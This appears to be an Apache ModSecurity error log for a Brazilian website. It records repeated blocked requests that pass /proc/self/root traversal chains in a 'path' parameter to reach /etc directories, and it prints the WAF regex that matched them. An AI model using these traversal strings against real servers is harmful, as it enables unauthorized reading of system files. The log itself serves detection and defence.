[Wed Mar 18 07:45:14.219551 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:40772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCOuoXxyEfFpUF8f9OkQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 07:45:16.625563 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:33634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCO-oXxyEfFpUF8f9OlAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:45:18.080200 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:59394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCPta6ubjKNq_cu4Z3cAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:45:28.605876 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:54788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:45:36.405079 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:59408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCUNa6ubjKNq_cu4Z3kgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:45:51.999376 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:39180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCX-yqAr6etmhZHNqcXwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:45:54.782315 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:40594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCYvu8EFLIOrSqIpvlywAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:46:04.535034 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:39192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCbOw_le52K8_3pV2_yAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:46:17.448926 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:54506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCeSmAPhZkrhU8w4lNrwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 07:46:17.563139 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:37422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCefu8EFLIOrSqIpvl9AAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:46:20.919401 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:50662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCfEzinOy1jxa1j4fycwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 07:46:32.419909 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:58342] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:46:37.503416 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:33936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCjSmAPhZkrhU8w4lNyAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:47:03.794588 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:33548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCp_u8EFLIOrSqIpvmOQAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:47:10.679503 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:57022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCrtY0UrI5A3LftIx-OgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:47:24.274743 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:56424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCvNa6ubjKNq_cu4Z4LgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:47:24.305770 2026] [mime_magic:error] [pid 29882:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:33138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:47:33.855026 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:58288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCxQkwaGbbGflqUZDxUQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:47:48.594946 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:48100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC1OyqAr6etmhZHNqdAgAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:47:49.494299 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:56010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC1cdf6f5d65gmYZS0jQAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:47:51.046524 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.228.61:50862] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqC1ymAPhZkrhU8w4lOEwAAAJE"]
[Wed Mar 18 07:47:52.910801 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.244.43:55132] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqC2Pu8EFLIOrSqIpvmdwAAAlU"]
[Wed Mar 18 07:47:54.052875 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:58460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC2kzinOy1jxa1j4fy2wAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:47:59.852987 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:58472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC3wkwaGbbGflqUZDxdwAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:48:01.419560 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:35462] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC4UzinOy1jxa1j4fy6AAAAQc"]
[Wed Mar 18 07:48:03.526254 2026] [mime_magic:error] [pid 30077:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:35606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:48:06.175340 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:35612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC5ta6ubjKNq_cu4Z4YAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
